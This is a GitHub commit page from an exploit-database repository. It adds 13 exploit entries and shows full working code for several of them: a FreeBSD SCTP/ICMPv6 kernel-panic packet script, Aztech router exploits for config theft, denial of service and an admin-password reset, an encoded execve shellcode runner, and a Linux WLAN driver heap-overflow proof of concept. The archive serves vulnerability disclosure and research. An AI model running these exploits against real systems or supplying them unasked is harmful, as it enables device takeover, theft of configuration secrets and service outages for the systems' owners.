Skip to content

Commit 386bdfe

Browse files
author
Offensive Security
committed
DB: 2016-01-26
13 new exploits
1 parent 5f07a69 commit 386bdfe

14 files changed

Lines changed: 1066 additions & 0 deletions

File tree

files.csv

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -35545,3 +35545,16 @@ id,file,description,date,author,platform,type,port
3554535545
39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin Authorization Bypass Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
3554635546
39303,platforms/php/webapps/39303.txt,"WordPress Xhanch My Twitter Plugin Cross Site Request Forgery Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
3554735547
39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin 'admin.php' Cross Site Request Forgery Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
35548+
39305,platforms/freebsd/dos/39305.py,"FreeBSD SCTP ICMPv6 Error Processing Vulnerability",2016-01-25,ptsecurity,freebsd,dos,0
35549+
39306,platforms/php/webapps/39306.html,"pfSense Firewall <= 2.2.5 - Config File CSRF",2016-01-25,"Aatif Shahdad",php,webapps,443
35550+
39308,platforms/linux/dos/39308.c,"Linux Kernel - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos,0
35551+
39309,platforms/php/webapps/39309.txt,"Wordpress Booking Calendar Contact Form Plugin <=1.1.23 - Unauthenticated SQL injection",2016-01-25,"i0akiN SEC-LABORATORY",php,webapps,80
35552+
39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux 2 (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
35553+
39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
35554+
39312,platforms/lin_x86-64/shellcode/39312.c,"x86_64 Linux xor/not/div Encoded execve Shellcode",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
35555+
39313,platforms/php/webapps/39313.txt,"Food Order Portal 'admin_user_delete.php' Cross Site Request Forgery Vulnerability",2014-09-12,KnocKout,php,webapps,0
35556+
39314,platforms/hardware/remote/39314.c,"Aztech Modem Routers Information Disclosure Vulnerability",2014-09-15,"Eric Fajardo",hardware,remote,0
35557+
39315,platforms/hardware/remote/39315.pl,"Multiple Aztech Routers '/cgi-bin/AZ_Retrain.cgi' Denial of Service Vulnerability",2014-09-15,"Federick Joe P Fajardo",hardware,remote,0
35558+
39316,platforms/hardware/remote/39316.pl,"Multiple Aztech Modem Routers Session Hijacking Vulnerability",2014-09-15,"Eric Fajardo",hardware,remote,0
35559+
39317,platforms/php/webapps/39317.txt,"WordPress Wordfence Security Plugin Multiple Vulnerabilities",2014-09-14,Voxel@Night,php,webapps,0
35560+
39318,platforms/multiple/remote/39318.txt,"Laravel 'Hash::make()' Function Password Truncation Security Weakness",2014-09-16,"Pichaya Morimoto",multiple,remote,0

platforms/freebsd/dos/39305.py

Lines changed: 44 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,44 @@
1+
#!/usr/bin/env python
2+
# -*- coding: utf-8 -*-
3+
4+
'''
5+
Source: http://blog.ptsecurity.com/2016/01/severe-vulnerabilities-detected-in.html
6+
7+
SCTP (stream control transmission protocol) is a transport-layer protocol designed to transfer signaling messages in an IP environment. As a rule, mobile operators use this protocol in technological networks.
8+
9+
This vulnerability threatens FreeBSD systems (versions 9.3, 10.1, and 10.2) if they support SCTP and IPv6 (default configuration). To exploit this flaw, a malefactor needs to send a specially crafted ICMPv6 message. And if he succeeds, he can conduct a DoS attack.
10+
11+
Denial of service is caused by improper check of the length of an SCTP packet header received from the ICMPv6 error message. If the target recipient is unavailable, the router can generate an error message and send it to the sender via ICMPv6.
12+
13+
This ICMPv6 packet includes the original IPv6 packet where the Next Header field indicates how SCTP is encapsulated.
14+
15+
When the kernel receives the error message via ICMPv6, it transfers the upper-level protocol packet to a necessary parser (sctp6_ctlinput()). The SCTP parser considers the incoming header has the required length, tries to copy it using m_copydata(), which has offset values and the number of bytes. Since a twelve-byte chunk is expected, if the attacker sends a packet with an eleven-byte header, a NULL pointer is dereferenced causing kernel panic.
16+
17+
There is no need for an open SCTP socket to successfully exploit this vulnerability. Scapy can help to create an ICMPv6 packet.
18+
'''
19+
20+
import argparse
21+
from scapy.all import *
22+
23+
24+
def get_args():
25+
parser = argparse.ArgumentParser(description='#' * 78, epilog='#' * 78)
26+
parser.add_argument("-m", "--dst_mac", type=str, help="FreeBSD mac address")
27+
parser.add_argument("-i", "--dst_ipv6", type=str, help="FreeBSD IPv6 address")
28+
parser.add_argument("-I", "--iface", type=str, help="Iface")
29+
options = parser.parse_args()
30+
31+
if options.dst_mac is None or options.dst_ipv6 is None:
32+
parser.print_help()
33+
exit()
34+
35+
return options
36+
37+
38+
if __name__ == '__main__':
39+
options = get_args()
40+
41+
sendp(Ether(dst=options.dst_mac) / IPv6(dst=options.dst_ipv6) / ICMPv6DestUnreach() / IPv6(nh=132,
42+
src=options.dst_ipv6,
43+
dst='fe80::230:56ff:fea6:648c'),
44+
iface=options.iface)

platforms/hardware/remote/39314.c

Lines changed: 37 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,37 @@
1+
source: http://www.securityfocus.com/bid/69808/info
2+
3+
Aztech Modem Routers are prone to an information-disclosure vulnerability.
4+
5+
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
6+
7+
HOST=$1
8+
PORT=$2
9+
PARM1="\x48\x6f\x73\x74\x3a\x20"
10+
PARM2="\x50\x72\x6f\x78\x79\x2d\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65"
11+
PARM3="\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x69\x6d\x61\x67\x65\x2f\x77\x65\x62\x70\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38"
12+
PARM4="\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x33\x37\x2e\x30\x2e\x32\x30\x36\x32\x2e\x31\x30\x33\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36"
13+
PARM5="\x52\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x61\x64\x6d\x53\x65\x74\x74\x69\x6e\x67\x73\x2e\x61\x73\x70"
14+
PARM6="\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x64\x65\x66\x6c\x61\x74\x65\x2c\x73\x64\x63\x68"
15+
PARM7="\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x38"
16+
17+
NARGS=1
18+
BARGS=65
19+
main() {
20+
printf "\---------------------------------------------\n";
21+
printf "++ Aztech Modem Get Configuration File Exploit\n";
22+
printf "++ Usage: $0 TARGET PORT\n";
23+
printf "++ Ex: $0 192.168.254.254 80\n\n";
24+
25+
}
26+
27+
[[ $# -le $NARGS ]] && main && exit $BARGS
28+
29+
curl -i -H "$PARM1" \
30+
-H "$PARM2" \
31+
-H "$PARM3" \
32+
-H "$PARM4" \
33+
-H "$PARM5" \
34+
-H "$PARM6" \
35+
-H "$PARM7" http://www.example.com:$PORT/%63%67%69%2d%62%69%6e%2f%75%73%65%72%72%6f%6d%66%69%6c%65%2e%63%67%69 > romfile.cfg
36+
37+

platforms/hardware/remote/39315.pl

Lines changed: 42 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
source: http://www.securityfocus.com/bid/69809/info
2+
3+
Multiple Aztech routers are prone to a denial-of-service vulnerability.
4+
5+
Attackers may exploit this issue to cause an affected device to crash, resulting in a denial-of-service condition.
6+
7+
Aztech DSL5018EN, DSL705E and DSL705EU are vulnerable.
8+
9+
#!/usr/bin/perl
10+
use strict;
11+
use IO::Socket;
12+
13+
if(!defined($ARGV[0])) {
14+
system ('clear');
15+
print "---------------------------------------------\n";
16+
print "++ Aztech Modem Denial of Service Attack\n";
17+
print "++ Usage: perl $0 TARGET:PORT\n";
18+
print "++ Ex: perl $0 192.168.254.254:80\n\n";
19+
exit;
20+
}
21+
22+
my $TARGET = $ARGV[0];
23+
my ($HOST, $PORT)= split(':',$TARGET);
24+
my $PATH = "%2f%63%67%69%2d%62%69%6e%2f%41%5a%5f%52%65%74%72%61%69%6e%2e%63%67%69";
25+
26+
system ('clear');
27+
print "---------------------------------------------\n";
28+
print "++ Resetting WAN modem $TARGET\n";
29+
30+
my $POST = "GET $PATH HTTP/1.1";
31+
my $ACCEPT = "Accept: text/html";
32+
33+
my $sock = new IO::Socket::INET ( PeerAddr => "$HOST",PeerPort => "$PORT",Proto => "tcp"); die "[-] Can't creat socket: $!\n" unless $sock;
34+
35+
print $sock "$POST\n";
36+
print $sock "$ACCEPT\n\n";
37+
print "++ Sent. The modem should be disconnected by now.\n";
38+
$sock->close();
39+
40+
exit;
41+
42+

platforms/hardware/remote/39316.pl

Lines changed: 81 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,81 @@
1+
source: http://www.securityfocus.com/bid/69811/info
2+
3+
Multiple Aztech Modem Routers are prone to a session-hijacking vulnerability.
4+
5+
An attacker can exploit this issue to gain unauthorized access to the affected device.
6+
7+
#!/usr/bin/perl
8+
# Title: Aztech Modem Broken Session Management Exploit
9+
# Author: Eric Fajardo - fjpfajardo@ph.ibm.com
10+
#
11+
# A successful authentication of a privilege (admin) ID in the
12+
# web portal allows any attacker in the network to hijack and
13+
# reuse the existing session in order to trick and allow the web
14+
# server to execute administrative commands. The command may be
15+
# freely executed from any terminal in the network as long as
16+
# the session of the privilege ID is valid. The below PoC shows
17+
# an un-authenticated request to the web server for an administrator
18+
# and user password reset.
19+
#
20+
# This exploit was tested working with the following modems:
21+
# - DSL5018EN(1T1R) from Globe Telecom
22+
# - DSL705E
23+
# - DSL705EU
24+
25+
use strict;
26+
use IO::Socket;
27+
28+
if(!defined($ARGV[0])) {
29+
system ('clear');
30+
print "---------------------------------------------\n";
31+
print "++ Aztech Modem Broken Session Management Exploit\n";
32+
print "++ Usage: perl $0 TARGET:PORT NEWPASSWORD\n";
33+
print "++ Ex: perl $0 192.168.254.254:80 h4rh4rHaR\n\n";
34+
exit;
35+
}
36+
37+
my $TARGET = $ARGV[0];
38+
my $NEWPASS = $ARGV[1];
39+
my ($HOST, $PORT)= split(':',$TARGET);
40+
my $PATH = "/cgi-bin/admAccess.asp";
41+
42+
system ('clear');
43+
print "---------------------------------------------\n";
44+
print "++ Sending POST string to $TARGET ...\n";
45+
46+
my $PAYLOAD = "saveFlag=1&adminFlag=1&SaveBtn=SAVE&uiViewTools_Password=$NEWPASS&uiViewTools_PasswordConfirm=$NEWPASS&uiViewTools_Password1=$NEWPASS&uiViewTools_PasswordConfirm1=$NEWPASS";
47+
my $POST = "POST $PATH HTTP/1.1";
48+
49+
my $ACCEPT = "Accept: text/html, application/xhtml+xml, */*";
50+
my $REFERER = "Referer: http://$HOST/cgi-bin/admAccess.asp";
51+
my $LANG = "Accept-Language: en-US";
52+
my $AGENT = "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25";
53+
my $CONTYPE = "Content-Type: application/x-www-form-urlencoded";
54+
my $ACENCODING = "Accept-Encoding: gzip, deflate";
55+
my $PROXYCONN = "Proxy-Connection: Keep-Alive";
56+
my $CONNLENGTH = "Content-Length: 179";
57+
my $DNT = "DNT: 1";
58+
my $TARGETHOST = "Host: $HOST";
59+
my $PRAGMA = "Pragma: no-cache";
60+
61+
my $sock = new IO::Socket::INET ( PeerAddr => "$HOST",PeerPort => "$PORT",Proto => "tcp"); die "[-] Can't creat socket: $!\n" unless $sock;
62+
63+
print $sock "$POST\n";
64+
print $sock "$ACCEPT\n";
65+
print $sock "$REFERER\n";
66+
print $sock "$LANG\n";
67+
print $sock "$AGENT\n";
68+
print $sock "$CONTYPE\n";
69+
print $sock "$ACENCODING\n";
70+
print $sock "$PROXYCONN\n";
71+
print $sock "$CONNLENGTH\n";
72+
print $sock "$DNT\n";
73+
print $sock "$TARGETHOST\n";
74+
print $sock "$PRAGMA\n\n";
75+
print $sock "$PAYLOAD\n";
76+
77+
print "++ Sent. Connect to the web URL http://$HOST with user:admin password:$NEWPASS\n";
78+
$sock->close();
79+
exit;
80+
81+

platforms/lin_x86-64/shellcode/39312.c

Lines changed: 65 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,65 @@
1+
/*---------------------------------------------------------------------------------------------------------------------
2+
/*
3+
*Title: x86_64 linux-Xor/not/div encoded execve shellcode
4+
*Author: Sathish kumar
5+
*Contact: https://www.linkedin.com/in/sathish94
6+
* Copyright: (c) 2016 iQube. (http://iQube.io)
7+
* Release Date: January 6, 2016
8+
*Description: X86_64 linux-Xor/not/div encoded execve shellcode 54 bytes
9+
*Tested On: Ubuntu 14.04 LTS
10+
*SLAE64-1408
11+
*Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
12+
* ./bindshell
13+
*
14+
*
15+
*/
16+
/*
17+
global _start
18+
section .text
19+
_start:
20+
21+
22+
jmp short call_shellcode
23+
24+
25+
decoder:
26+
pop rdi
27+
xor rcx, rcx
28+
xor rdx, rdx
29+
xor rax, rax
30+
mov cl, 26
31+
32+
decode:
33+
not byte [rdi] ; not function is appplied
34+
xor byte [rdi], 0xee ; xor function with 0xee
35+
mov rax, rdi ; multiplication is done
36+
mov ecx, 0x2
37+
mul ecx
38+
mov rdi, rax
39+
inc rdi
40+
loop decode ; loop continues until the shellcode size is completed
41+
42+
jmp short shellcode_to_decode ; Pointed to the decoded shellcode
43+
44+
call_shellcode:
45+
call decoder
46+
shellcode_to_decode: db 0x35,0x09,0x6a,0x35,0x6a,0x62,0x22,0x39,0x35,0x4c,0x06,0x20,0x25,0x26,0x06,0x06,0x28,0x25,0x38,0x3b,0x3e,0x24,0x0c,0x3d,0x16,0x13
47+
*/
48+
49+
#include<stdio.h>
50+
#include<string.h>
51+
52+
unsigned char code[] = \
53+
"\xeb\x15\x5f\x48\x31\xc9\xb1\x1a\x80\x37\xee\xf6\x17\x80\x2f\x03\x48\xff\xc7\xe2\xf3\xeb\x05\xe8\xe6\xff\xff\xff\x5a\x25\xe8\x5a\xeb\xf8\x78\x42\x5a\xaf\x23\x74\x7d\x60\x23\x23\x67\x7a\x47\x46\x73\x7c\x2f\x4a\x03\x19";
54+
main()
55+
{
56+
57+
printf("Shellcode Length: %d\n", (int)strlen(code));
58+
59+
int (*ret)() = (int(*)())code;
60+
61+
ret();
62+
63+
}
64+
65+

platforms/linux/dos/39308.c

Lines changed: 76 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,76 @@
1+
/*
2+
* Coder: Shawn the R0ck, [citypw@gmail.com]
3+
* Co-worker: Pray3r, [pray3r.z@gmail.com]
4+
* Compile:
5+
* # arm-linux-androideabi-gcc wext_poc.c --sysroot=$SYS_ROOT -pie
6+
* # ./a.out wlan0
7+
* Boom......shit happens[ as always];-)
8+
*/
9+
10+
#include <stdio.h>
11+
#include <string.h>
12+
#include <stdlib.h>
13+
#include <sys/ioctl.h>
14+
#include <sys/types.h>
15+
#include <sys/socket.h>
16+
#include <linux/wireless.h>
17+
#include <errno.h>
18+
19+
typedef unsigned char v_U8_t;
20+
#define HDD_MAX_CMP_PER_PACKET_FILTER 5
21+
22+
struct PacketFilterParamsCfg {
23+
v_U8_t protocolLayer;
24+
v_U8_t cmpFlag;
25+
v_U8_t dataOffset;
26+
v_U8_t dataLength;
27+
v_U8_t compareData[8];
28+
v_U8_t dataMask[8];
29+
};
30+
31+
typedef struct {
32+
v_U8_t filterAction;
33+
v_U8_t filterId;
34+
v_U8_t numParams;
35+
struct PacketFilterParamsCfg
36+
paramsData[HDD_MAX_CMP_PER_PACKET_FILTER];
37+
} tPacketFilterCfg, *tpPacketFilterCfg;
38+
39+
int main(int argc, const char *argv[])
40+
{
41+
if (argc != 2) {
42+
fprintf(stderr, "Bad usage\n");
43+
fprintf(stderr, "Usage: %s ifname\n", argv[0]);
44+
return -1;
45+
}
46+
47+
struct iwreq req;
48+
strcpy(req.ifr_ifrn.ifrn_name, argv[1]);
49+
int fd, status, i = 0;
50+
fd = socket(AF_INET, SOCK_DGRAM, 0);
51+
tPacketFilterCfg p_req;
52+
53+
/* crafting a data structure to triggering the code path */
54+
req.u.data.pointer =
55+
malloc(sizeof(v_U8_t) * 3 +
56+
sizeof(struct PacketFilterParamsCfg) * 5);
57+
p_req.filterAction = 1;
58+
p_req.filterId = 0;
59+
p_req.numParams = 3;
60+
for (; i < 5; i++) {
61+
p_req.paramsData[i].dataLength = 241;
62+
memset(&p_req.paramsData[i].compareData, 0x41, 16);
63+
}
64+
65+
memcpy(req.u.data.pointer, &p_req,
66+
sizeof(v_U8_t) * 3 +
67+
sizeof(struct PacketFilterParamsCfg) * 5);
68+
69+
if (ioctl(fd, 0x8bf7, &req) == -1) {
70+
fprintf(stderr, "Failed ioct() get on interface %s: %s\n",
71+
argv[1], strerror(errno));
72+
} else {
73+
printf("You shouldn't see this msg...\n");
74+
}
75+
76+
}

0 commit comments

Comments
 (0)